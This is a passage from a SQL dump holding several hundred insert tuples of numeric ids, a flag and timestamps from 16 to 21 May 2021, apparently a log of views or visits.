18:50:45'),(21601,1594,1,'2021-05-16','2021-05-16 19:12:14'),(21602,1588,1,'2021-05-16','2021-05-16 19:17:36'),(21603,2904,1,'2021-05-16','2021-05-16 19:17:42'),(21604,1594,1,'2021-05-16','2021-05-16 19:38:47'),(21605,2989,1,'2021-05-16','2021-05-16 19:39:14'),(21606,1594,1,'2021-05-16','2021-05-16 19:46:40'),(21607,1594,1,'2021-05-16','2021-05-16 20:19:04'),(21608,1602,1,'2021-05-16','2021-05-16 21:35:43'),(21609,1602,1,'2021-05-16','2021-05-16 21:36:34'),(21610,91,1,'2021-05-16','2021-05-16 21:37:38'),(21611,76,1,'2021-05-16','2021-05-16 21:38:39'),(21612,1602,1,'2021-05-16','2021-05-16 21:39:09'),(21613,1602,1,'2021-05-16','2021-05-16 21:40:17'),(21614,1734,1,'2021-05-16','2021-05-16 21:40:40'),(21615,1602,1,'2021-05-16','2021-05-16 21:40:48'),(21616,1730,1,'2021-05-16','2021-05-16 21:41:06'),(21617,76,1,'2021-05-16','2021-05-16 21:41:28'),(21618,91,1,'2021-05-16','2021-05-16 21:41:32'),(21619,1602,1,'2021-05-16','2021-05-16 21:41:42'),(21620,2410,1,'2021-05-16','2021-05-16 22:55:49'),(21621,1730,1,'2021-05-17','2021-05-17 01:36:18'),(21622,2410,1,'2021-05-17','2021-05-17 01:40:47'),(21623,2609,1,'2021-05-17','2021-05-17 02:12:32'),(21624,2769,1,'2021-05-17','2021-05-17 02:36:58'),(21625,1544,1,'2021-05-17','2021-05-17 04:18:01'),(21626,3066,1,'2021-05-17','2021-05-17 05:00:14'),(21627,1608,1,'2021-05-17','2021-05-17 05:50:50'),(21628,1602,1,'2021-05-17','2021-05-17 06:23:16'),(21629,1602,1,'2021-05-17','2021-05-17 06:23:27'),(21630,68,1,'2021-05-17','2021-05-17 06:25:07'),(21631,72,1,'2021-05-17','2021-05-17 06:25:59'),(21632,80,1,'2021-05-17','2021-05-17 06:26:33'),(21633,87,1,'2021-05-17','2021-05-17 06:32:38'),(21634,91,1,'2021-05-17','2021-05-17 06:32:40'),(21635,91,1,'2021-05-17','2021-05-17 06:32:57'),(21636,488,1,'2021-05-17','2021-05-17 06:33:14'),(21637,76,1,'2021-05-17','2021-05-17 06:33:37'),(21638,89,1,'2021-05-17','2021-05-17 06:34:58'),(21639,1602,1,'2021-05-17','2021-05-17 06:36:54'),(21640,1602,1,'2021-05-17','2021-05-17 06:40:18'),(21641,1596,1,'2021-05-17','2021-05-17 08:14:53'),(21642,1774,1,'2021-05-17','2021-05-17 08:27:05'),(21643,1596,1,'2021-05-17','2021-05-17 08:39:40'),(21644,1600,1,'2021-05-17','2021-05-17 08:56:26'),(21645,2159,1,'2021-05-17','2021-05-17 08:59:06'),(21646,2309,1,'2021-05-17','2021-05-17 09:39:22'),(21647,1598,1,'2021-05-17','2021-05-17 10:00:36'),(21648,1598,1,'2021-05-17','2021-05-17 10:09:01'),(21649,1594,1,'2021-05-17','2021-05-17 10:09:08'),(21650,2159,1,'2021-05-17','2021-05-17 10:22:20'),(21651,1606,1,'2021-05-17','2021-05-17 10:38:20'),(21652,1602,1,'2021-05-17','2021-05-17 11:03:37'),(21653,2309,1,'2021-05-17','2021-05-17 11:08:31'),(21654,1586,1,'2021-05-17','2021-05-17 11:17:13'),(21655,2457,1,'2021-05-17','2021-05-17 11:25:03'),(21656,1602,1,'2021-05-17','2021-05-17 11:39:15'),(21657,91,1,'2021-05-17','2021-05-17 11:40:43'),(21658,335,1,'2021-05-17','2021-05-17 11:44:27'),(21659,1602,1,'2021-05-17','2021-05-17 11:44:50'),(21660,87,1,'2021-05-17','2021-05-17 11:45:12'),(21661,1588,1,'2021-05-17','2021-05-17 11:54:31'),(21662,3079,1,'2021-05-17','2021-05-17 11:55:49'),(21663,80,1,'2021-05-17','2021-05-17 11:59:05'),(21664,2309,1,'2021-05-17','2021-05-17 12:01:56'),(21665,1592,1,'2021-05-17','2021-05-17 12:46:42'),(21666,1594,1,'2021-05-17','2021-05-17 12:54:01'),(21667,89,1,'2021-05-17','2021-05-17 12:54:37'),(21668,1594,1,'2021-05-17','2021-05-17 12:54:58'),(21669,1602,1,'2021-05-17','2021-05-17 14:17:56'),(21670,1544,1,'2021-05-17','2021-05-17 14:26:20'),(21671,76,1,'2021-05-17','2021-05-17 14:27:01'),(21672,1544,1,'2021-05-17','2021-05-17 14:27:30'),(21673,108,1,'2021-05-17','2021-05-17 14:28:16'),(21674,91,1,'2021-05-17','2021-05-17 14:29:20'),(21675,1544,1,'2021-05-17','2021-05-17 14:30:02'),(21676,1602,1,'2021-05-17','2021-05-17 14:30:10'),(21677,91,1,'2021-05-17','2021-05-17 14:30:22'),(21678,1606,1,'2021-05-17','2021-05-17 15:03:05'),(21679,1606,1,'2021-05-17','2021-05-17 15:03:30'),(21680,1600,1,'2021-05-17','2021-05-17 15:12:41'),(21681,1600,1,'2021-05-17','2021-05-17 15:14:15'),(21682,1600,1,'2021-05-17','2021-05-17 15:15:06'),(21683,1600,1,'2021-05-17','2021-05-17 15:21:44'),(21684,1544,1,'2021-05-17','2021-05-17 16:13:43'),(21685,3030,1,'2021-05-17','2021-05-17 16:39:19'),(21686,3030,1,'2021-05-17','2021-05-17 16:44:46'),(21687,1774,1,'2021-05-17','2021-05-17 17:02:41'),(21688,1602,1,'2021-05-17','2021-05-17 17:03:16'),(21689,91,1,'2021-05-17','2021-05-17 17:05:01'),(21690,68,1,'2021-05-17','2021-05-17 17:06:35'),(21691,84,1,'2021-05-17','2021-05-17 17:08:01'),(21692,76,1,'2021-05-17','2021-05-17 17:08:29'),(21693,1588,1,'2021-05-17','2021-05-17 17:21:07'),(21694,76,1,'2021-05-17','2021-05-17 17:27:01'),(21695,1586,1,'2021-05-17','2021-05-17 17:27:25'),(21696,1594,1,'2021-05-17','2021-05-17 17:47:25'),(21697,3253,1,'2021-05-17','2021-05-17 17:48:22'),(21698,76,1,'2021-05-17','2021-05-17 17:52:21'),(21699,3253,1,'2021-05-17','2021-05-17 17:53:21'),(21700,3253,1,'2021-05-17','2021-05-17 18:58:16'),(21701,1594,1,'2021-05-17','2021-05-17 19:30:26'),(21702,1594,1,'2021-05-17','2021-05-17 20:11:34'),(21703,1734,1,'2021-05-17','2021-05-17 20:18:15'),(21704,1747,1,'2021-05-17','2021-05-17 21:32:59'),(21705,1600,1,'2021-05-17','2021-05-17 21:42:48'),(21706,1602,1,'2021-05-17','2021-05-17 22:17:49'),(21707,1747,1,'2021-05-17','2021-05-17 22:22:03'),(21708,1747,1,'2021-05-17','2021-05-17 22:22:31'),(21709,1747,1,'2021-05-17','2021-05-17 22:23:59'),(21710,3030,1,'2021-05-17','2021-05-17 22:53:53'),(21711,1592,1,'2021-05-17','2021-05-17 23:24:43'),(21712,1594,1,'2021-05-18','2021-05-18 01:52:54'),(21713,1600,1,'2021-05-18','2021-05-18 04:05:14'),(21714,1600,1,'2021-05-18','2021-05-18 04:05:17'),(21715,1600,1,'2021-05-18','2021-05-18 04:05:18'),(21716,1586,1,'2021-05-18','2021-05-18 04:25:09'),(21717,1588,1,'2021-05-18','2021-05-18 04:48:20'),(21718,68,1,'2021-05-18','2021-05-18 04:58:09'),(21719,1596,1,'2021-05-18','2021-05-18 05:57:45'),(21720,1747,1,'2021-05-18','2021-05-18 07:07:22'),(21721,1747,1,'2021-05-18','2021-05-18 07:08:05'),(21722,1747,1,'2021-05-18','2021-05-18 07:38:51'),(21723,1608,1,'2021-05-18','2021-05-18 08:32:17'),(21724,2991,1,'2021-05-18','2021-05-18 08:34:20'),(21725,478,1,'2021-05-18','2021-05-18 08:39:29'),(21726,3253,1,'2021-05-18','2021-05-18 09:01:14'),(21727,1600,1,'2021-05-18','2021-05-18 09:49:14'),(21728,1602,1,'2021-05-18','2021-05-18 10:17:33'),(21729,1588,1,'2021-05-18','2021-05-18 10:26:37'),(21730,3714,1,'2021-05-18','2021-05-18 10:35:42'),(21731,1602,1,'2021-05-18','2021-05-18 11:01:24'),(21732,1602,1,'2021-05-18','2021-05-18 11:01:33'),(21733,1602,1,'2021-05-18','2021-05-18 11:21:54'),(21734,1588,1,'2021-05-18','2021-05-18 11:26:21'),(21735,80,1,'2021-05-18','2021-05-18 11:26:35'),(21736,3714,1,'2021-05-18','2021-05-18 11:34:10'),(21737,1604,1,'2021-05-18','2021-05-18 12:35:37'),(21738,84,1,'2021-05-18','2021-05-18 12:35:46'),(21739,1594,1,'2021-05-18','2021-05-18 12:42:36'),(21740,84,1,'2021-05-18','2021-05-18 12:48:46'),(21741,3694,1,'2021-05-18','2021-05-18 12:48:52'),(21742,1870,1,'2021-05-18','2021-05-18 12:52:46'),(21743,1594,1,'2021-05-18','2021-05-18 13:08:39'),(21744,1608,1,'2021-05-18','2021-05-18 13:21:45'),(21745,80,1,'2021-05-18','2021-05-18 13:24:36'),(21746,80,1,'2021-05-18','2021-05-18 13:25:36'),(21747,1608,1,'2021-05-18','2021-05-18 13:25:55'),(21748,1608,1,'2021-05-18','2021-05-18 13:26:12'),(21749,1594,1,'2021-05-18','2021-05-18 13:28:34'),(21750,1594,1,'2021-05-18','2021-05-18 13:28:46'),(21751,1594,1,'2021-05-18','2021-05-18 13:29:01'),(21752,1594,1,'2021-05-18','2021-05-18 13:30:32'),(21753,1588,1,'2021-05-18','2021-05-18 13:48:30'),(21754,1594,1,'2021-05-18','2021-05-18 13:49:32'),(21755,1586,1,'2021-05-18','2021-05-18 14:01:31'),(21756,473,1,'2021-05-18','2021-05-18 14:02:35'),(21757,87,1,'2021-05-18','2021-05-18 14:03:24'),(21758,76,1,'2021-05-18','2021-05-18 14:03:56'),(21759,89,1,'2021-05-18','2021-05-18 14:04:30'),(21760,1586,1,'2021-05-18','2021-05-18 14:04:45'),(21761,80,1,'2021-05-18','2021-05-18 14:41:07'),(21762,1602,1,'2021-05-18','2021-05-18 14:42:57'),(21763,80,1,'2021-05-18','2021-05-18 14:43:00'),(21764,1608,1,'2021-05-18','2021-05-18 15:22:48'),(21765,470,1,'2021-05-18','2021-05-18 15:26:39'),(21766,68,1,'2021-05-18','2021-05-18 15:42:24'),(21767,1596,1,'2021-05-18','2021-05-18 15:46:22'),(21768,68,1,'2021-05-18','2021-05-18 15:46:53'),(21769,1596,1,'2021-05-18','2021-05-18 15:47:04'),(21770,2159,1,'2021-05-18','2021-05-18 15:51:05'),(21771,1877,1,'2021-05-18','2021-05-18 16:09:09'),(21772,3030,1,'2021-05-18','2021-05-18 16:58:30'),(21773,3226,1,'2021-05-18','2021-05-18 18:39:47'),(21774,1594,1,'2021-05-18','2021-05-18 18:54:11'),(21775,1600,1,'2021-05-18','2021-05-18 18:55:58'),(21776,1594,1,'2021-05-18','2021-05-18 18:56:27'),(21777,3273,1,'2021-05-18','2021-05-18 18:57:28'),(21778,2161,1,'2021-05-18','2021-05-18 19:00:44'),(21779,76,1,'2021-05-18','2021-05-18 19:03:38'),(21780,1594,1,'2021-05-18','2021-05-18 19:05:04'),(21781,2248,1,'2021-05-18','2021-05-18 19:52:48'),(21782,1582,1,'2021-05-18','2021-05-18 19:56:01'),(21783,1598,1,'2021-05-18','2021-05-18 20:29:49'),(21784,1598,1,'2021-05-18','2021-05-18 20:29:50'),(21785,91,1,'2021-05-18','2021-05-18 20:45:36'),(21786,1602,1,'2021-05-18','2021-05-18 21:23:16'),(21787,2904,1,'2021-05-18','2021-05-18 22:54:05'),(21788,1592,1,'2021-05-19','2021-05-19 00:37:44'),(21789,1588,1,'2021-05-19','2021-05-19 03:09:11'),(21790,72,1,'2021-05-19','2021-05-19 04:11:54'),(21791,1774,1,'2021-05-19','2021-05-19 04:21:08'),(21792,2248,1,'2021-05-19','2021-05-19 04:38:34'),(21793,3087,1,'2021-05-19','2021-05-19 04:46:24'),(21794,2704,1,'2021-05-19','2021-05-19 05:48:57'),(21795,2309,1,'2021-05-19','2021-05-19 06:24:16'),(21796,1600,1,'2021-05-19','2021-05-19 07:01:02'),(21797,1600,1,'2021-05-19','2021-05-19 07:01:04'),(21798,1745,1,'2021-05-19','2021-05-19 07:02:20'),(21799,1598,1,'2021-05-19','2021-05-19 07:35:59'),(21800,1598,1,'2021-05-19','2021-05-19 07:36:01'),(21801,1598,1,'2021-05-19','2021-05-19 07:36:02'),(21802,1612,1,'2021-05-19','2021-05-19 08:20:35'),(21803,1612,1,'2021-05-19','2021-05-19 08:20:45'),(21804,1602,1,'2021-05-19','2021-05-19 08:46:43'),(21805,2161,1,'2021-05-19','2021-05-19 09:33:23'),(21806,3664,1,'2021-05-19','2021-05-19 10:58:07'),(21807,2804,1,'2021-05-19','2021-05-19 11:22:45'),(21808,1594,1,'2021-05-19','2021-05-19 11:44:07'),(21809,68,1,'2021-05-19','2021-05-19 11:45:43'),(21810,1594,1,'2021-05-19','2021-05-19 11:46:10'),(21811,1588,1,'2021-05-19','2021-05-19 12:07:18'),(21812,1766,1,'2021-05-19','2021-05-19 12:10:18'),(21813,1594,1,'2021-05-19','2021-05-19 12:35:28'),(21814,468,1,'2021-05-19','2021-05-19 13:25:25'),(21815,1588,1,'2021-05-19','2021-05-19 13:44:43'),(21816,1598,1,'2021-05-19','2021-05-19 14:05:05'),(21817,1606,1,'2021-05-19','2021-05-19 14:23:10'),(21818,91,1,'2021-05-19','2021-05-19 14:34:44'),(21819,1594,1,'2021-05-19','2021-05-19 14:35:13'),(21820,1592,1,'2021-05-19','2021-05-19 14:36:08'),(21821,1602,1,'2021-05-19','2021-05-19 14:42:06'),(21822,3087,1,'2021-05-19','2021-05-19 14:58:25'),(21823,3087,1,'2021-05-19','2021-05-19 15:00:54'),(21824,1709,1,'2021-05-19','2021-05-19 15:49:05'),(21825,3051,1,'2021-05-19','2021-05-19 15:55:48'),(21826,2159,1,'2021-05-19','2021-05-19 16:44:02'),(21827,1606,1,'2021-05-19','2021-05-19 17:06:29'),(21828,2159,1,'2021-05-19','2021-05-19 17:10:57'),(21829,2148,1,'2021-05-19','2021-05-19 17:29:16'),(21830,1600,1,'2021-05-19','2021-05-19 17:52:20'),(21831,1606,1,'2021-05-19','2021-05-19 17:55:02'),(21832,1606,1,'2021-05-19','2021-05-19 18:22:54'),(21833,2161,1,'2021-05-19','2021-05-19 19:15:41'),(21834,2309,1,'2021-05-19','2021-05-19 19:17:12'),(21835,2457,1,'2021-05-19','2021-05-19 20:45:37'),(21836,1586,1,'2021-05-19','2021-05-19 22:39:30'),(21837,1713,1,'2021-05-19','2021-05-19 22:39:48'),(21838,1713,1,'2021-05-19','2021-05-19 22:40:13'),(21839,3030,1,'2021-05-20','2021-05-20 00:39:50'),(21840,1778,1,'2021-05-20','2021-05-20 02:05:59'),(21841,3087,1,'2021-05-20','2021-05-20 02:31:41'),(21842,2296,1,'2021-05-20','2021-05-20 02:43:42'),(21843,3051,1,'2021-05-20','2021-05-20 03:03:01'),(21844,3041,1,'2021-05-20','2021-05-20 03:41:45'),(21845,3041,1,'2021-05-20','2021-05-20 04:08:46'),(21846,80,1,'2021-05-20','2021-05-20 04:17:59'),(21847,2165,1,'2021-05-20','2021-05-20 04:29:44'),(21848,1606,1,'2021-05-20','2021-05-20 04:48:40'),(21849,80,1,'2021-05-20','2021-05-20 05:29:58'),(21850,2148,1,'2021-05-20','2021-05-20 06:19:17'),(21851,1726,1,'2021-05-20','2021-05-20 06:40:46'),(21852,2457,1,'2021-05-20','2021-05-20 07:10:42'),(21853,1602,1,'2021-05-20','2021-05-20 07:33:02'),(21854,102,1,'2021-05-20','2021-05-20 07:41:11'),(21855,1602,1,'2021-05-20','2021-05-20 07:42:50'),(21856,3107,1,'2021-05-20','2021-05-20 08:06:54'),(21857,1608,1,'2021-05-20','2021-05-20 08:39:15'),(21858,1602,1,'2021-05-20','2021-05-20 08:40:14'),(21859,1594,1,'2021-05-20','2021-05-20 08:49:06'),(21860,1594,1,'2021-05-20','2021-05-20 08:49:06'),(21861,1594,1,'2021-05-20','2021-05-20 08:49:09'),(21862,1602,1,'2021-05-20','2021-05-20 09:16:13'),(21863,1602,1,'2021-05-20','2021-05-20 09:16:14'),(21864,1602,1,'2021-05-20','2021-05-20 09:18:30'),(21865,3041,1,'2021-05-20','2021-05-20 09:43:06'),(21866,1602,1,'2021-05-20','2021-05-20 10:16:28'),(21867,1606,1,'2021-05-20','2021-05-20 10:18:31'),(21868,1606,1,'2021-05-20','2021-05-20 10:20:12'),(21869,1602,1,'2021-05-20','2021-05-20 10:35:39'),(21870,1606,1,'2021-05-20','2021-05-20 10:56:08'),(21871,3096,1,'2021-05-20','2021-05-20 10:59:41'),(21872,1728,1,'2021-05-20','2021-05-20 11:05:08'),(21873,1600,1,'2021-05-20','2021-05-20 11:16:28'),(21874,91,1,'2021-05-20','2021-05-20 11:17:29'),(21875,1600,1,'2021-05-20','2021-05-20 11:18:24'),(21876,1586,1,'2021-05-20','2021-05-20 11:21:17'),(21877,1602,1,'2021-05-20','2021-05-20 11:50:58'),(21878,91,1,'2021-05-20','2021-05-20 11:52:09'),(21879,91,1,'2021-05-20','2021-05-20 12:02:23'),(21880,3030,1,'2021-05-20','2021-05-20 12:09:34'),(21881,3006,1,'2021-05-20','2021-05-20 12:23:01'),(21882,1588,1,'2021-05-20','2021-05-20 12:38:38'),(21883,91,1,'2021-05-20','2021-05-20 12:42:30'),(21884,3006,1,'2021-05-20','2021-05-20 12:48:41'),(21885,1602,1,'2021-05-20','2021-05-20 12:49:36'),(21886,1602,1,'2021-05-20','2021-05-20 12:51:15'),(21887,1602,1,'2021-05-20','2021-05-20 12:51:29'),(21888,76,1,'2021-05-20','2021-05-20 12:52:10'),(21889,3109,1,'2021-05-20','2021-05-20 12:59:34'),(21890,478,1,'2021-05-20','2021-05-20 13:02:16'),(21891,108,1,'2021-05-20','2021-05-20 13:20:06'),(21892,1602,1,'2021-05-20','2021-05-20 13:22:11'),(21893,1602,1,'2021-05-20','2021-05-20 13:23:33'),(21894,1592,1,'2021-05-20','2021-05-20 13:29:21'),(21895,478,1,'2021-05-20','2021-05-20 13:32:16'),(21896,1718,1,'2021-05-20','2021-05-20 13:52:07'),(21897,1600,1,'2021-05-20','2021-05-20 14:04:19'),(21898,1600,1,'2021-05-20','2021-05-20 14:04:20'),(21899,1602,1,'2021-05-20','2021-05-20 14:07:54'),(21900,1602,1,'2021-05-20','2021-05-20 14:26:48'),(21901,74,1,'2021-05-20','2021-05-20 14:29:07'),(21902,2503,1,'2021-05-20','2021-05-20 14:30:01'),(21903,2503,1,'2021-05-20','2021-05-20 14:37:17'),(21904,1588,1,'2021-05-20','2021-05-20 14:39:26'),(21905,1594,1,'2021-05-20','2021-05-20 14:39:39'),(21906,1594,1,'2021-05-20','2021-05-20 14:39:47'),(21907,2159,1,'2021-05-20','2021-05-20 15:30:54'),(21908,2159,1,'2021-05-20','2021-05-20 15:31:19'),(21909,2159,1,'2021-05-20','2021-05-20 15:31:21'),(21910,468,1,'2021-05-20','2021-05-20 15:31:38'),(21911,1600,1,'2021-05-20','2021-05-20 15:33:32'),(21912,1600,1,'2021-05-20','2021-05-20 15:33:52'),(21913,1600,1,'2021-05-20','2021-05-20 15:36:24'),(21914,1780,1,'2021-05-20','2021-05-20 16:01:15'),(21915,1586,1,'2021-05-20','2021-05-20 16:49:32'),(21916,1586,1,'2021-05-20','2021-05-20 16:49:38'),(21917,1586,1,'2021-05-20','2021-05-20 16:49:45'),(21918,2159,1,'2021-05-20','2021-05-20 16:59:30'),(21919,2159,1,'2021-05-20','2021-05-20 16:59:32'),(21920,2159,1,'2021-05-20','2021-05-20 17:58:01'),(21921,2159,1,'2021-05-20','2021-05-20 17:58:09'),(21922,91,1,'2021-05-20','2021-05-20 18:01:01'),(21923,2159,1,'2021-05-20','2021-05-20 18:03:01'),(21924,2159,1,'2021-05-20','2021-05-20 18:03:02'),(21925,3438,1,'2021-05-20','2021-05-20 18:53:37'),(21926,1600,1,'2021-05-20','2021-05-20 18:55:44'),(21927,1600,1,'2021-05-20','2021-05-20 18:55:44'),(21928,1600,1,'2021-05-20','2021-05-20 19:01:24'),(21929,1594,1,'2021-05-20','2021-05-20 19:41:49'),(21930,3285,1,'2021-05-20','2021-05-20 19:56:05'),(21931,2159,1,'2021-05-20','2021-05-20 20:02:39'),(21932,1588,1,'2021-05-20','2021-05-20 20:16:14'),(21933,3275,1,'2021-05-20','2021-05-20 20:35:56'),(21934,1594,1,'2021-05-20','2021-05-20 20:47:32'),(21935,2457,1,'2021-05-20','2021-05-20 20:52:00'),(21936,3092,1,'2021-05-20','2021-05-20 20:52:04'),(21937,1600,1,'2021-05-20','2021-05-20 21:04:23'),(21938,102,1,'2021-05-20','2021-05-20 21:22:43'),(21939,469,1,'2021-05-20','2021-05-20 21:24:31'),(21940,3038,1,'2021-05-20','2021-05-20 21:38:59'),(21941,3038,1,'2021-05-20','2021-05-20 21:39:19'),(21942,1582,1,'2021-05-20','2021-05-20 22:28:16'),(21943,3271,1,'2021-05-20','2021-05-20 22:40:50'),(21944,1544,1,'2021-05-20','2021-05-20 22:44:46'),(21945,3280,1,'2021-05-20','2021-05-20 22:56:39'),(21946,1600,1,'2021-05-20','2021-05-20 23:03:36'),(21947,3261,1,'2021-05-20','2021-05-20 23:16:16'),(21948,2769,1,'2021-05-20','2021-05-20 23:59:26'),(21949,2769,1,'2021-05-21','2021-05-21 00:02:01'),(21950,1722,1,'2021-05-21','2021-05-21 00:15:51'),(21951,1588,1,'2021-05-21','2021-05-21 00:21:57'),(21952,3178,1,'2021-05-21','2021-05-21 00:55:17'),(21953,2159,1,'2021-05-21','2021-05-21 00:58:49'),(21954,2159,1,'2021-05-21','2021-05-21 00:58:50'),(21955,2159,1,'2021-05-21','2021-05-21 01:01:33'),(21956,2159,1,'2021-05-21','2021-05-21 01:01:34'),(21957,2965,1,'2021-05-21','2021-05-21 01:16:07'),(21958,2159,1,'2021-05-21','2021-05-21 01:29:14'),(21959,2159,1,'2021-05-21','2021-05-21 01:29:17'),(21960,2159,1,'2021-05-21','2021-05-21 01:32:39'),(21961,2159,1,'2021-05-21','2021-05-21 01:32:41'),(21962,1596,1,'2021-05-21','2021-05-21 01:53:16'),(21963,3275,1,'2021-05-21','2021-05-21 02:25:26'),(21964,1600,1,'2021-05-21','2021-05-21 02:45:59'),(21965,1600,1,'2021-05-21','2021-05-21 02:45:59'),(21966,1600,1,'2021-05-21','2021-05-21 02:46:29'),(21967,1600,1,'2021-05-21','2021-05-21 02:46:30'),(21968,3271,1,'2021-05-21','2021-05-21 04:46:41'),(21969,3280,1,'2021-05-21','2021-05-21 05:27:12'),(21970,91,1,'2021-05-21','2021-05-21 05:38:45'),(21971,3181,1,'2021-05-21','2021-05-21 06:46:43'),(21972,1592,1,'2021-05-21','2021-05-21 07:19:13'),(21973,1602,1,'2021-05-21','2021-05-21 07:36:19'),(21974,1594,1,'2021-05-21','2021-05-21 07:55:06'),(21975,1544,1,'2021-05-21','2021-05-21 07:57:34'),(21976,80,1,'2021-05-21','2021-05-21 07:58:34'),(21977,1594,1,'2021-05-21','2021-05-21 07:59:56'),(21978,68,1,'2021-05-21','2021-05-21 08:00:06'),(21979,2309,1,'2021-05-21','2021-05-21 08:06:59'),(21980,1747,1,'2021-05-21','2021-05-21 08:07:52'),(21981,485,1,'2021-05-21','2021-05-21 08:29:38'),(21982,3181,1,'2021-05-21','2021-05-21 08:47:37'),(21983,1600,1,'2021-05-21','2021-05-21 08:51:24'),(21984,1751,1,'2021-05-21','2021-05-21 08:57:49'),(21985,1614,1,'2021-05-21','2021-05-21 09:10:55'),(21986,1602,1,'2021-05-21','2021-05-21 09:25:17'),(21987,1596,1,'2021-05-21','2021-05-21 09:30:32'),(21988,91,1,'2021-05-21','2021-05-21 09:32:23'),(21989,76,1,'2021-05-21','2021-05-21 09:34:30'),(21990,89,1,'2021-05-21','2021-05-21 09:35:10'),(21991,87,1,'2021-05-21','2021-05-21 09:37:48'),(21992,1602,1,'2021-05-21','2021-05-21 10:11:20'),(21993,2457,1,'2021-05-21','2021-05-21 10:22:25'),(21994,1602,1,'2021-05-21','2021-05-21 10:23:31'),(21995,1602,1,'2021-05-21','2021-05-21 10:23:32'),(21996,1602,1,'2021-05-21','2021-05-21 10:25:41'),(21997,1594,1,'2021-05-21','2021-05-21 10:25:42'),(21998,76,1,'2021-05-21','2021-05-21 10:25:50'),(21999,80,1,'2021-05-21','2021-05-21 10:26:36'),(22000,485,1,'2021-05-21','2021-05-21 10:28:36'),(22001,80,1,'2021-05-21','2021-05-21 10:29:21'),(22002,76,1,'2021-05-21','2021-05-21 10:30:06'),(22003,1588,1,'2021-05-21','2021-05-21 10:34:53'),(22004,3287,1,'2021-05-21','2021-05-21 10:39:56'),(22005,470,1,'2021-05-21','2021-05-21 10:47:58'),(22006,2704,1,'2021-05-21','2021-05-21 11:05:46'),(22007,2457,1,'2021-05-21','2021-05-21 11:23:15'),(22008,80,1,'2021-05-21','2021-05-21 11:23:39'),(22009,108,1,'2021-05-21','2021-05-21 12:04:50'),(22010,2457,1,'2021-05-21','2021-05-21 12:16:32'),(22011,1600,1,'2021-05-21','2021-05-21 12:21:18'),(22012,1600,1,'2021-05-21','2021-05-21 12:22:39'),(22013,2989,1,'2021-05-21','2021-05-21 12:27:18'),(22014,1594,1,'2021-05-21','2021-05-21 12:36:51'),(22015,1588,1,'2021-05-21','2021-05-21 12:41:32'),(22016,2309,1,'2021-05-21','2021-05-21 13:44:47'),(22017,1602,1,'2021-05-21','2021-05-21 13:53:01'),(22018,1602,1,'2021-05-21','2021-05-21 13:53:30'),(22019,1600,1,'2021-05-21','2021-05-21 14:05:24'),(22020,1600,1,'2021-05-21','2021-05-21 14:05:32'),(22021,3109,1,'2021-05-21','2021-05-21 14:57:48'),(22022,1594,1,'2021-05-21','2021-05-21 16:22:22'),(22023,3541,1,'2021-05-21','2021-05-21 16:44:45'),(22024,74,1,'2021-05-21','2021-05-21 17:08:06'),(22025,1766,1,'2021-05-21','2021-05-21 17:58:10'),(22026,2769,1,'2021-05-21','2021-05-21 18:07:49'),(22027,87,1,'2021-05-21','2021-05-21 18:13:52'),(22028,570,1,'2021-05-21','2021-05-21 18:59:18'),(22029,1600,1,'2021-05-21','2021-05-21 19:02:01'),(22030,1600,1,'2021-05-21','2021-05-21 19:02:03'),(22031,1600,1,'2021-05-21','2021-05-21 19:08:34'),(22032,1600,1,'2021-05-21','2021-05-21 19:08:34'),(22033,1600,1,'2021-05-21','2021-05-21 19:08:35'),(22034,3285,1,'2021-05-21','2021-05-21 19:12:08'),(22035,570,1,'2021-05-21','2021-05-21 19:12:16'),(22036,1741,1,'2021-05-21','2021-05-21 19:42:33'),(22037,89,1,'2021-05-21','2021-05-21 19:52:27'),(22038,3253,1,'2021-05-21','2021-05-21 19:58:00'),(22039,1774,1,'2021-05-21','2021-05-21 20:02:16'),(22040,3245,1,'2021-05-21','2021-05-21 20:02:31'),(22041,2609,1,'2021-05-21','2021-05-21 20:12:24'),(22042,2309,1,'2021-05-21','2021-05-21 20:12:27'),(22043,1598,1,'2021-05-21','2021-05-21 20:31:55'),(22044,80,1,'2021-05-21','2021-05-21 20:43:27'),(22045,1586,1,'2021-05-21','2021-05-21 21:03:26'),(22046,1602,1,'2021-05-21','2021-05-21 21:04:20'),(22047,1730,1,'2021-05-21','2021-05-21 21:06:16'),(22048,3090,1,'2021-05-21','2021-05-21 21:13:15'),(22049,2297,1,'2021-05-21','2021-05-21 21:13:39'),(22050,3045,1,'2021-05-21','2021-05-21 21:14:18'),(22051,1596,1,'2021-05-21','2021-05-21 21:15:42'),(22052,2809,1,'2021-05-21','2021-05-21 21:17:51'),(22053,3090,1,'2021-05-21','2021-05-21 21:18:40'),(22054,91,1,'2021-05-21','2021-05-21 21:24:08'),(22055,470,1,'2021-05-21','2021-05-21 21:34:03'),(22056,1600,1,'2021-05-21','2021-05-21 21:34:06'),(22057,476,1,'2021-05-21','2021-05-21 21:37:53'),(22058,1600,1,'2021-05-21','2021-05-21 21:44:10'),(22059,1582,1,'2021-05-21','2021-05-21 21:54:02'),(22060,1741,1,'2021-05-21','2021-05-21 21:54:03'),(22061,3430,1,'2021-05-21','2021-05-21 21:56:51'),(22062,1718,1,'2021-05-21','2021-05-21 22:04:14'),(22063,1592,1,'2021-05-21','2021-05-21 22:04:17'),(22064,3313,1,'2021-05-21','2021-05-21 22:06:52'),(22065,1590,1,'2021-05-21','2021-05-21 22:14:38'),(22066,1582,1,'2021-05-21','2021-05-21 22:24:07'),(22067,1602,1,'2021-05-21','2021-05-21 22:26:46'),(22068,1709,1,'2021-05-21','2021-05-21 22:44:28'),(22069,91,1,'2021-05-21','2021-05-21 22:44:30'),(22070,3674,1,'2021-05-21','2021-05-21 22:54:39'),(22071,1594,1,'2021-05-21','2021-05-21 22:54:43'),(22072,1604,1,'2021-05-21','2021-05-21 22:55:23'),(22073,2154,1,'2021-05-21','2021-05-21 22:55:25'),(22074,1588,1,'2021-05-21','2021-05-21 23:04:35'),(22075,3083,1,'2021-05-21','2021-05-21 23:04:39'),(22076,2769,1,'2021-05-21','2021-05-21 23:07:48'),(22077,477,1,'2021-05-21','2021-05-21 23:14:52'),(22078,3307,1,'2021-05-21','2021-05-21 23:14:56'),(22079,1766,1,'2021-05-21','2021-05-21 23:17:44'),(22080,468,1,'2021-05-21','2021-05-21 23:24:45'),(22081,3104,1,'2021-05-21','2021-05-21 23:26:51'),(22082,2804,1,'2021-05-21','2021-05-21 23:34:54'),(22083,1709,1,'2021-05-21','2021-05-21 23:34:57'),(22084,3498,1,'2021-05-21','2021-05-21 23:37:04'),(22085,3694,1,'2021-05-21','2021-05-21 23:39:12'),(22086,1614,1,'2021-05-21','2021-05-21 